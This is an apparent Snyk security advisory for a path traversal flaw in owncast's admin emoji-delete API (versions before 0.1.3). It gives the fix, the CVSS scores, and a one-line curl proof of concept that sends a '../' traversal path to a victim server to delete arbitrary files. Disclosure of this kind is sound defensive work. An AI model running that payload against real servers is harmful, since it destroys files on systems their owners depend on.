Path Traversal Affecting github.com/owncast/owncast/controllers/admin package, versions <0.1.3


Severity

0.0
medium
0
10

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.05% (16th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-GOLANG-GITHUBCOMOWNCASTOWNCASTCONTROLLERSADMIN-6669946
  • published 21 Apr 2024
  • disclosed 19 Apr 2024
  • credit Tony Torralba

How to fix?

Upgrade github.com/owncast/owncast/controllers/admin to version 0.1.3 or higher.

Overview

github.com/owncast/owncast/controllers/admin is a module for live stream video and chat

Affected versions of this package are vulnerable to Path Traversal via the DeleteCustomEmoji() function in the emoji/delete endpoint of the /api/admin API. Admin users can delete arbitrary files on the system, outside of the emoji directory, by supplying a malicious filepath in the JSON input.

PoC

curl -X 'POST' \
    -H 'Authorization: Basic <ADMIN_CREDENTIALS>' \
    --data '{"name":"../../../../../../../tmp/test"}' \
    'http://(victim_server):8080/api/admin/emoji/delete'

CVSS Scores

version 3.1
Expand this section

Snyk

4.1 medium
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    High
  • User Interaction (UI)
    None
  • Scope (S)
    Changed
  • Confidentiality (C)
    None
  • Integrity (I)
    None
  • Availability (A)
    Low